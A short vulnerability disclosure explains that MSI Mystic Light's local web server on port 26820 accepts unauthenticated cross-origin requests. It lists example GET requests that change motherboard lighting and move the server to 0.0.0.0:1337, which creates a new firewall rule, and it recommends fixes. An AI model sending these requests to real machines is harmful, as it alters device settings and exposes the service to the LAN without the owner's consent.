If you have the MSI Dragon Center software installed (or just the Mystic Light app), random websites can control the RGB lighting on your motherboard and graphics card!
The latest version of Mystic Light as of this writing (18.104.22.168) is affected.
This one applies the "Color Cycle" effect to the motherboard LEDs:GET /GetDeviceInfo HTTP/1.1 Host: localhost:26820
And this one stops the HTTP server, deletes the old firewall rule, adds a new one for 1337/tcp, then restarts the server on 0.0.0.0:1337:GET /SetStyleID=112&DeviceIndex=0&DeviceType=MSI_MB HTTP/1.1 Host: localhost:26820
GET /SetServerPort=1337 HTTP/1.1 Host: localhost:26820
The server does whitelist
localhost as the only acceptable hostname in the
Host header. This means that DNS rebinding probably won't work to bypass the same-origin policy and read responses (like GetDeviceInfo) from a malicious browser origin.
However, an attacker doesn't need to read any responses to change your RGB settings. All requests supported by the server are simple requests, which don't trigger CORS preflighting and get sent no matter what origin they come from. Hence, this web page.
Note that this attack can be done from the LAN by simply issuing requests to TARGET_IP:26820, because of the firewall rule.
MSI can fix the malicious website attack by validating the
Origin header of requests to its Mystic Light Web API Server.
MSI should also work out an authentication mechanism or bind the server to 127.0.0.1 only to prevent unauthorized users on the LAN from messing with the server.